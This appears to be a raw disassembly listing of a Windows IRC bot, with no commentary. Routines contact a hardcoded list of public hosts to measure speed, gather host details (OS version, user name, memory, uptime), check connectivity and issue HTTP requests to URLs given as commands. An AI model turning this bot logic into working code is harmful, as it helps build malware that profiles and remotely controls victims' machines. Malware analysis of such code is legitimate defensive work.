var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 8
mov [ebp+var_4], 3
mov [ebp+var_3C], offset aWww_schlund_ne ; "www.schlund.net"
mov [ebp+var_38], offset aWww_utwente_nl ; "www.utwente.nl"
mov [ebp+var_34], offset aVerio_fr ; "verio.fr"
mov [ebp+var_30], offset aWww_1und1_de ; "www.1und1.de"
mov [ebp+var_2C], offset aWww_switch_ch ; "www.switch.ch"
mov [ebp+var_28], offset aWww_belwue_de ; "www.belwue.de"
mov [ebp+var_24], offset aDe_yahoo_com ; "de.yahoo.com"
mov [ebp+var_20], offset aWww_google_it ; "www.google.it"
mov [ebp+var_6C], offset aWww_xo_net ; "www.xo.net"
mov [ebp+var_68], offset aWww_stanford_e ; "www.stanford.edu"
mov [ebp+var_64], offset aWww_verio_com ; "www.verio.com"
mov [ebp+var_60], offset aWww_nocster_co ; "www.nocster.com"
mov [ebp+var_5C], offset aWww_rit_edu ; "www.rit.edu"
mov [ebp+var_58], offset aWww_cogentco_c ; "www.cogentco.com"
mov [ebp+var_54], offset aWww_burst_net ; "www.burst.net"
mov [ebp+var_50], offset aNitro_ucsc_edu ; "nitro.ucsc.edu"
mov [ebp+var_4C], offset aWww_level3_com ; "www.level3.com"
mov [ebp+var_48], offset aWww_above_net ; "www.above.net"
mov [ebp+var_44], offset aWww_easynews_c ; "www.easynews.com"
mov [ebp+var_40], offset aWww_google_com ; "www.google.com"
mov [ebp+var_1C], offset aWww_lib_nthu_e ; "www.lib.nthu.edu.tw"
mov [ebp+var_18], offset aWww_st_lib_kei ; "www.st.lib.keio.ac.jp"
mov [ebp+var_14], offset aWww_d1asia_com ; "www.d1asia.com"
mov [ebp+var_10], offset aWww_nifty_com ; "www.nifty.com"
mov [ebp+var_C], offset aYahoo_co_jp ; "yahoo.co.jp"
mov [ebp+var_8], offset aWww_google_co_ ; "www.google.co.jp"
call sub_41B147
push [ebp+eax*4+var_3C]
call sub_41B161
push 8
mov esi, eax
call sub_41B147
push [ebp+eax*4+var_3C]
call sub_41B161
add esp, 10h
test esi, esi
jz short loc_41B43F
test eax, eax
jz short loc_41B43B
lea ebx, [eax+esi]
shr ebx, 1
jmp short loc_41B441
; ---------------------------------------------------------------------------
loc_41B43B: ; CODE XREF: sub_41B33E+F4�j
mov ebx, esi
jmp short loc_41B441
; ---------------------------------------------------------------------------
loc_41B43F: ; CODE XREF: sub_41B33E+F0�j
mov ebx, eax
loc_41B441: ; CODE XREF: sub_41B33E+FB�j
; sub_41B33E+FF�j
push 0Ch
call sub_41B147
push [ebp+eax*4+var_6C]
call sub_41B161
push 0Ch
mov edi, eax
call sub_41B147
push [ebp+eax*4+var_6C]
call sub_41B161
add esp, 10h
test edi, edi
jz short loc_41B479
test eax, eax
jz short loc_41B475
lea esi, [eax+edi]
shr esi, 1
jmp short loc_41B47B
; ---------------------------------------------------------------------------
loc_41B475: ; CODE XREF: sub_41B33E+12E�j
mov esi, edi
jmp short loc_41B47B
; ---------------------------------------------------------------------------
loc_41B479: ; CODE XREF: sub_41B33E+12A�j
mov esi, eax
loc_41B47B: ; CODE XREF: sub_41B33E+135�j
; sub_41B33E+139�j
push 6
call sub_41B147
push [ebp+eax*4+var_1C]
call sub_41B161
push 6
mov edi, eax
call sub_41B147
push [ebp+eax*4+var_1C]
call sub_41B161
add esp, 10h
test edi, edi
jz short loc_41B4B3
test eax, eax
jz short loc_41B4AF
lea ecx, [eax+edi]
shr ecx, 1
jmp short loc_41B4B5
; ---------------------------------------------------------------------------
loc_41B4AF: ; CODE XREF: sub_41B33E+168�j
mov ecx, edi
jmp short loc_41B4B5
; ---------------------------------------------------------------------------
loc_41B4B3: ; CODE XREF: sub_41B33E+164�j
mov ecx, eax
loc_41B4B5: ; CODE XREF: sub_41B33E+16F�j
; sub_41B33E+173�j
xor eax, eax
test ebx, ebx
jz short loc_41B4C2
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41B4C5
; ---------------------------------------------------------------------------
loc_41B4C2: ; CODE XREF: sub_41B33E+17B�j
push 2
pop edi
loc_41B4C5: ; CODE XREF: sub_41B33E+182�j
test esi, esi
jz short loc_41B4CD
add eax, esi
jmp short loc_41B4CE
; ---------------------------------------------------------------------------
loc_41B4CD: ; CODE XREF: sub_41B33E+189�j
dec edi
loc_41B4CE: ; CODE XREF: sub_41B33E+18D�j
test ecx, ecx
jz short loc_41B4D6
add eax, ecx
jmp short loc_41B4D7
; ---------------------------------------------------------------------------
loc_41B4D6: ; CODE XREF: sub_41B33E+192�j
dec edi
loc_41B4D7: ; CODE XREF: sub_41B33E+196�j
xor edx, edx
div edi
push eax
push ecx
push esi
push ebx
lea eax, [ebp+var_26C]
push offset dword_4514F8
push eax
call sub_41EA60
push 0
lea eax, [ebp+var_26C]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409C75
lea eax, [ebp+var_26C]
push eax
call sub_415A3C
add esp, 30h
pop edi
pop esi
pop ebx
leave
retn
sub_41B33E endp
; =============== S U B R O U T I N E =======================================
sub_41B51B proc near ; CODE XREF: sub_401C87+255A�p
; sub_401C87+29DE�p ...
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_4F537C ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
xor edx, edx
mov ecx, 15180h
mov esi, 0E10h
push 3Ch
pop edi
sub eax, [esp+8+arg_0]
div ecx
mov ecx, eax
mov eax, edx
xor edx, edx
div esi
mov esi, eax
mov eax, edx
xor edx, edx
div edi
push eax
push esi
push ecx
push offset dword_451558
mov esi, offset dword_4F32AC
push 32h
push esi
call sub_41EC30
add esp, 18h
mov eax, esi
pop edi
pop esi
retn
sub_41B51B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B56E proc near ; CODE XREF: sub_41786C+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
push esi
push eax
xor esi, esi
mov [ebp+var_94], 94h
call ds:dword_4F539C ; GetVersionExA
test eax, eax
jz short loc_41B600
cmp [ebp+var_90], 4
jnz short loc_41B5D6
cmp [ebp+var_8C], esi
jnz short loc_41B5BE
cmp [ebp+var_84], 1
jnz short loc_41B5B0
inc esi
loc_41B5B0: ; CODE XREF: sub_41B56E+3F�j
cmp [ebp+var_84], 2
jnz short loc_41B600
xor esi, esi
inc esi
jmp short loc_41B600
; ---------------------------------------------------------------------------
loc_41B5BE: ; CODE XREF: sub_41B56E+36�j
cmp [ebp+var_8C], 0Ah
jnz short loc_41B5CB
loc_41B5C7: ; CODE XREF: sub_41B56E+77�j
push 2
jmp short loc_41B5FF
; ---------------------------------------------------------------------------
loc_41B5CB: ; CODE XREF: sub_41B56E+57�j
cmp [ebp+var_8C], 5Ah
jnz short loc_41B600
jmp short loc_41B5F0
; ---------------------------------------------------------------------------
loc_41B5D6: ; CODE XREF: sub_41B56E+2E�j
cmp [ebp+var_90], 5
jnz short loc_41B600
cmp [ebp+var_8C], esi
jz short loc_41B5C7
cmp [ebp+var_8C], 1
jnz short loc_41B5F4
loc_41B5F0: ; CODE XREF: sub_41B56E+66�j
push 3
jmp short loc_41B5FF
; ---------------------------------------------------------------------------
loc_41B5F4: ; CODE XREF: sub_41B56E+80�j
cmp [ebp+var_8C], 2
jnz short loc_41B600
push 7
loc_41B5FF: ; CODE XREF: sub_41B56E+5B�j
; sub_41B56E+84�j
pop esi
loc_41B600: ; CODE XREF: sub_41B56E+25�j
; sub_41B56E+49�j ...
mov eax, esi
pop esi
leave
retn
sub_41B56E endp
; =============== S U B R O U T I N E =======================================
sub_41B605 proc near ; CODE XREF: sub_41B6C1+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_41B60D: ; CODE XREF: sub_41B605+35�j
; sub_41B605+3B�j
call sub_41BA3E
push 3E8h
mov edi, eax
mov ebx, edx
call ds:dword_4F534C ; Sleep
call sub_41BA3E
sub eax, edi
push 0
sbb edx, ebx
push esi
push edx
push eax
call sub_421480
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_41B60D
jb short loc_41B642
cmp ebx, esi
ja short loc_41B60D
loc_41B642: ; CODE XREF: sub_41B605+37�j
push 0
push 64h
push edi
push ebx
call sub_4214F0
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_41B6B5
jb short loc_41B661
cmp esi, 50h
jnb short loc_41B666
loc_41B661: ; CODE XREF: sub_41B605+55�j
push 4Bh
xor edx, edx
pop eax
loc_41B666: ; CODE XREF: sub_41B605+5A�j
test ecx, ecx
ja short loc_41B6B5
jb short loc_41B671
cmp esi, 47h
jnb short loc_41B676
loc_41B671: ; CODE XREF: sub_41B605+65�j
push 42h
xor edx, edx
pop eax
loc_41B676: ; CODE XREF: sub_41B605+6A�j
test ecx, ecx
ja short loc_41B6B5
jb short loc_41B681
cmp esi, 37h
jnb short loc_41B686
loc_41B681: ; CODE XREF: sub_41B605+75�j
push 32h
xor edx, edx
pop eax
loc_41B686: ; CODE XREF: sub_41B605+7A�j
test ecx, ecx
ja short loc_41B6B5
jb short loc_41B691
cmp esi, 26h
jnb short loc_41B696
loc_41B691: ; CODE XREF: sub_41B605+85�j
push 21h
xor edx, edx
pop eax
loc_41B696: ; CODE XREF: sub_41B605+8A�j
test ecx, ecx
ja short loc_41B6B5
jb short loc_41B6A1
cmp esi, 1Eh
jnb short loc_41B6A6
loc_41B6A1: ; CODE XREF: sub_41B605+95�j
push 19h
xor edx, edx
pop eax
loc_41B6A6: ; CODE XREF: sub_41B605+9A�j
test ecx, ecx
ja short loc_41B6B5
jb short loc_41B6B1
cmp esi, 0Ah
jnb short loc_41B6B5
loc_41B6B1: ; CODE XREF: sub_41B605+A5�j
xor eax, eax
xor edx, edx
loc_41B6B5: ; CODE XREF: sub_41B605+53�j
; sub_41B605+63�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_41B605 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B6C1 proc near ; CODE XREF: sub_401C87+2732�p
var_968 = byte ptr -968h
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
var_4E8 = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
var_2E8 = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_18 = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 968h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset word_4F32DE
mov [ebp+var_CC], 94h
call ds:dword_4F539C ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_41B748
cmp [ebp+var_C4], ebx
jnz short loc_41B724
cmp [ebp+var_BC], 1
jnz short loc_41B70E
mov [ebp+var_4], offset dword_451564
loc_41B70E: ; CODE XREF: sub_41B6C1+44�j
cmp [ebp+var_BC], 2
jnz loc_41B7C3
mov [ebp+var_4], offset dword_451568
jmp short loc_41B794
; ---------------------------------------------------------------------------
loc_41B724: ; CODE XREF: sub_41B6C1+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_41B736
mov [ebp+var_4], offset dword_45156C
jmp short loc_41B78B
; ---------------------------------------------------------------------------
loc_41B736: ; CODE XREF: sub_41B6C1+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_41B784
mov [ebp+var_4], offset dword_451570
jmp short loc_41B78B
; ---------------------------------------------------------------------------
loc_41B748: ; CODE XREF: sub_41B6C1+33�j
cmp [ebp+var_C8], 5
jnz short loc_41B784
cmp [ebp+var_C4], ebx
jnz short loc_41B762
mov [ebp+var_4], offset dword_451574
jmp short loc_41B78B
; ---------------------------------------------------------------------------
loc_41B762: ; CODE XREF: sub_41B6C1+96�j
cmp [ebp+var_C4], 1
jnz short loc_41B774
mov [ebp+var_4], offset dword_451578
jmp short loc_41B78B
; ---------------------------------------------------------------------------
loc_41B774: ; CODE XREF: sub_41B6C1+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_41B78B
loc_41B784: ; CODE XREF: sub_41B6C1+7C�j
; sub_41B6C1+8E�j
mov [ebp+var_4], offset a??? ; "???"
loc_41B78B: ; CODE XREF: sub_41B6C1+73�j
; sub_41B6C1+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_41B7C3
loc_41B794: ; CODE XREF: sub_41B6C1+61�j
cmp [ebp+var_B8], bl
jz short loc_41B7C3
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push offset aSS_6 ; "%s (%s)"
push eax
call sub_41EA60
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_41B7C3: ; CODE XREF: sub_41B6C1+54�j
; sub_41B6C1+D1�j ...
mov ax, ds:word_451590
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, ds:dword_4E2EA8
mov [ebp+var_8], 100h
cmp eax, ebx
jz short loc_41B7FC
lea ecx, [ebp+var_8]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_41B7FC: ; CODE XREF: sub_41B6C1+12C�j
push [ebp+arg_4]
call sub_40AEAD
pop ecx
push eax
call ds:dword_4E3008 ; inet_addr
mov [ebp+var_C], eax
push 2
lea eax, [ebp+var_C]
push 4
push eax
call ds:dword_4E2F80 ; gethostbyaddr
cmp eax, ebx
jz short loc_41B825
push dword ptr [eax]
jmp short loc_41B82A
; ---------------------------------------------------------------------------
loc_41B825: ; CODE XREF: sub_41B6C1+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_41B82A: ; CODE XREF: sub_41B6C1+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_41EA60
pop ecx
lea eax, [ebp+var_4E8]
pop ecx
push 104h
push eax
call ds:dword_4F5348 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_4F53D8 ; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs_0 ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_4F53D4 ; GetTimeFormatA
push 20h
lea eax, [ebp+var_38]
push ebx
push eax
call sub_41E4B0
add esp, 0Ch
lea eax, [ebp+var_38]
push eax
call ds:dword_4F5468 ; GlobalMemoryStatus
push ebx
push ebx
lea eax, [ebp+var_18]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_41ED30
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_968]
push eax
call sub_41738D
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_41B51B
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_40AEAD
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_41727E
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_41727E
pop ecx
pop ecx
push eax
call sub_41B605
push edx
push eax
push offset dword_4515C8
push 200h
push [ebp+arg_0]
call sub_41EC30
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_41B6C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B975 proc near ; CODE XREF: sub_401C87+2760�p
; sub_401C87+7350�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_41E4B0
add esp, 0Ch
cmp ds:dword_4E30AC, 0
jnz short loc_41B9E9
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call ds:dword_4E2E8C ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_41B9CA
lea eax, [ebp+var_8C]
push offset dword_4516A4
push eax
call sub_41EA60
pop ecx
pop ecx
loc_41B9CA: ; CODE XREF: sub_41B975+40�j
test [ebp+var_C], 1
lea eax, [ebp+var_8]
jz short loc_41B9E2
push offset dword_4516B4
loc_41B9D8: ; CODE XREF: sub_41B975+72�j
push eax
call sub_41EA60
pop ecx
pop ecx
jmp short loc_41BA0B
; ---------------------------------------------------------------------------
loc_41B9E2: ; CODE XREF: sub_41B975+5C�j
push offset off_4516BC
jmp short loc_41B9D8
; ---------------------------------------------------------------------------
loc_41B9E9: ; CODE XREF: sub_41B975+28�j
lea eax, [ebp+var_8]
push offset off_4516C0
push eax
call sub_41EA60
lea eax, [ebp+var_8C]
push offset off_4516C4
push eax
call sub_41EA60
add esp, 10h
loc_41BA0B: ; CODE XREF: sub_41B975+6B�j
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40AEAD
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push offset dword_4516C8
push 200h
push [ebp+arg_0]
call sub_41EC30
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_41B975 endp
; =============== S U B R O U T I N E =======================================
sub_41BA3E proc near ; CODE XREF: sub_41B605:loc_41B60D�p
; sub_41B605+1C�p
rdtsc
retn
sub_41BA3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA41 proc near ; DATA XREF: sub_401C87+77BB�o
var_65C = byte ptr -65Ch
var_55C = byte ptr -55Ch
var_35C = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_35C]
rep movsd
xor esi, esi
mov edi, 80h
inc esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp+var_148]
push ebx
push eax
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], offset dword_45170C
call sub_41E4B0
push edi
lea eax, [ebp+var_1C8]
push ebx
push eax
call sub_41E4B0
push edi
lea eax, [ebp+var_C8]
push ebx
push eax
call sub_41E4B0
push 100h
lea eax, [ebp+var_65C]
push ebx
push eax
call sub_41E4B0
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_41E4B0
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_358]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_41BC70
pop ecx
push eax
lea eax, [ebp+var_358]
push eax
call ds:dword_4E2EC4 ; InternetCrackUrlA
test eax, eax
jz loc_41BBE1
cmp [ebp+var_34], ebx
jbe short loc_41BB18
push [ebp+var_34]
lea eax, [ebp+var_148]
push [ebp+var_38]
push eax
call sub_41E510
add esp, 0Ch
loc_41BB18: ; CODE XREF: sub_41BA41+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_41BB36
push [ebp+var_28]
lea eax, [ebp+var_1C8]
push [ebp+var_2C]
push eax
call sub_41E510
add esp, 0Ch
loc_41BB36: ; CODE XREF: sub_41BA41+DE�j
cmp [ebp+var_20], ebx
jbe short loc_41BB50
push [ebp+var_20]
lea eax, [ebp+var_C8]
push [ebp+var_24]
push eax
call sub_41E510
add esp, 0Ch
loc_41BB50: ; CODE XREF: sub_41BA41+F8�j
cmp [ebp+var_18], ebx
jbe short loc_41BB6A
push [ebp+var_18]
lea eax, [ebp+var_65C]
push [ebp+var_1C]
push eax
call sub_41E510
add esp, 0Ch
loc_41BB6A: ; CODE XREF: sub_41BA41+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+var_1C8]
push eax
lea eax, [ebp+var_148]
push esi
push eax
push ds:dword_4E2F78
call ds:dword_4E2F9C ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_41BBF7
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call ds:dword_4E2F90 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_41BBFE
push ebx
push ebx
push ebx
push ebx
push eax
call ds:dword_4E2F3C ; HttpSendRequestA
test eax, eax
lea eax, [ebp+var_55C]
jz short loc_41BBDA
push offset dword_451710
jmp short loc_41BC09
; ---------------------------------------------------------------------------
loc_41BBDA: ; CODE XREF: sub_41BA41+190�j
push offset unk_45172C
jmp short loc_41BC09
; ---------------------------------------------------------------------------
loc_41BBE1: ; CODE XREF: sub_41BA41+B7�j
lea eax, [ebp+var_55C]
push offset dword_451768
push eax
call sub_41EA60
mov esi, [ebp+var_C]
jmp short loc_41BC0F
; ---------------------------------------------------------------------------
loc_41BBF7: ; CODE XREF: sub_41BA41+153�j
push offset unk_451784
jmp short loc_41BC03
; ---------------------------------------------------------------------------
loc_41BBFE: ; CODE XREF: sub_41BA41+17B�j
push offset unk_4517B0
loc_41BC03: ; CODE XREF: sub_41BA41+1BB�j
lea eax, [ebp+var_55C]
loc_41BC09: ; CODE XREF: sub_41BA41+197�j
; sub_41BA41+19E�j
push eax
call sub_41EA60
loc_41BC0F: ; CODE XREF: sub_41BA41+1B4�j
cmp [ebp+var_1D4], ebx
pop ecx
pop ecx
jnz short loc_41BC3C
push ebx
lea eax, [ebp+var_55C]
push [ebp+var_1D0]
push eax
lea eax, [ebp+var_258]
push eax
push [ebp+var_35C]
call sub_409C75
add esp, 14h
loc_41BC3C: ; CODE XREF: sub_41BA41+1D6�j
lea eax, [ebp+var_55C]
push eax
call sub_415A3C
pop ecx
push esi
call ds:dword_4E2FFC ; InternetCloseHandle
push [ebp+var_4]
call ds:dword_4E2FFC ; InternetCloseHandle
push [ebp+var_1D8]
call sub_40B9A7
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
int 3 ; Trap to Debugger
sub_41BA41 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41BC70 proc near ; CODE XREF: sub_401000+38�p
; _0:004011F1�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_41BC90
loc_41BC7C: ; CODE XREF: sub_41BC70+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_41BCC3
test ecx, 3
jnz short loc_41BC7C
add eax, 0
loc_41BC90: ; CODE XREF: sub_41BC70+A�j
; sub_41BC70+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41BC90
mov eax, [ecx-4]
test al, al
jz short loc_41BCE1
test ah, ah
jz short loc_41BCD7
test eax, 0FF0000h
jz short loc_41BCCD
test eax, 0FF000000h
jz short loc_41BCC3
jmp short loc_41BC90
; ---------------------------------------------------------------------------
loc_41BCC3: ; CODE XREF: sub_41BC70+11�j
; sub_41BC70+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41BCCD: ; CODE XREF: sub_41BC70+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41BCD7: ; CODE XREF: sub_41BC70+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_41BCE1: ; CODE XREF: sub_41BC70+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_41BC70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BCF0 proc near ; CODE XREF: sub_4010AA+62�p
; sub_401C87+5997�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov [ebp+var_4], 0FFFFFFFFh
loc_41BCFE: ; CODE XREF: sub_41BCF0+36�j
cmp [ebp+arg_0], 0
jnz short loc_41BD22
push offset dword_43C504
push 0
push 3Ah
push offset dword_43C4F8
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41BD22
int 3 ; Trap to Debugger
loc_41BD22: ; CODE XREF: sub_41BCF0+12�j
; sub_41BCF0+2F�j
xor eax, eax
test eax, eax
jnz short loc_41BCFE
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
and edx, 40h
test edx, edx
jz short loc_41BD41
mov eax, [ebp+arg_0]
mov dword ptr [eax+0Ch], 0
jmp short loc_41BD68
; ---------------------------------------------------------------------------
loc_41BD41: ; CODE XREF: sub_41BCF0+43�j
mov ecx, [ebp+arg_0]
push ecx
call sub_422420
add esp, 4
mov edx, [ebp+arg_0]
push edx
call sub_41BD80
add esp, 4
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
call sub_422490
add esp, 4
loc_41BD68: ; CODE XREF: sub_41BCF0+4F�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41BCF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD80 proc near ; CODE XREF: sub_41BCF0+61�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
loc_41BD96: ; CODE XREF: sub_41BD80+3E�j
cmp [ebp+arg_0], 0
jnz short loc_41BDBA
push offset dword_43C514
push 0
push 77h
push offset dword_43C4F8
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_41BDBA
int 3 ; Trap to Debugger
loc_41BDBA: ; CODE XREF: sub_41BD80+1A�j
; sub_41BD80+37�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41BD96
mov edx, [ebp+var_8]
mov eax, [edx+0Ch]
and eax, 83h
test eax, eax
jz short loc_41BE2A
mov ecx, [ebp+var_8]
push ecx
call sub_422F20
add esp, 4
mov [ebp+var_4], eax
mov edx, [ebp+var_8]
push edx
call sub_422DE0
add esp, 4
mov eax, [ebp+var_8]
mov ecx, [eax+10h]
push ecx
call sub_422CB0
add esp, 4
test eax, eax
jge short loc_41BE06
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_41BE2A
; ---------------------------------------------------------------------------
loc_41BE06: ; CODE XREF: sub_41BD80+7B�j
mov edx, [ebp+var_8]
cmp dword ptr [edx+1Ch], 0
jz short loc_41BE2A
push 2
mov eax, [ebp+var_8]
mov ecx, [eax+1Ch]
push ecx
call sub_41CA10
add esp, 8
mov edx, [ebp+var_8]
mov dword ptr [edx+1Ch], 0
loc_41BE2A: ; CODE XREF: sub_41BD80+4D�j
; sub_41BD80+84�j ...
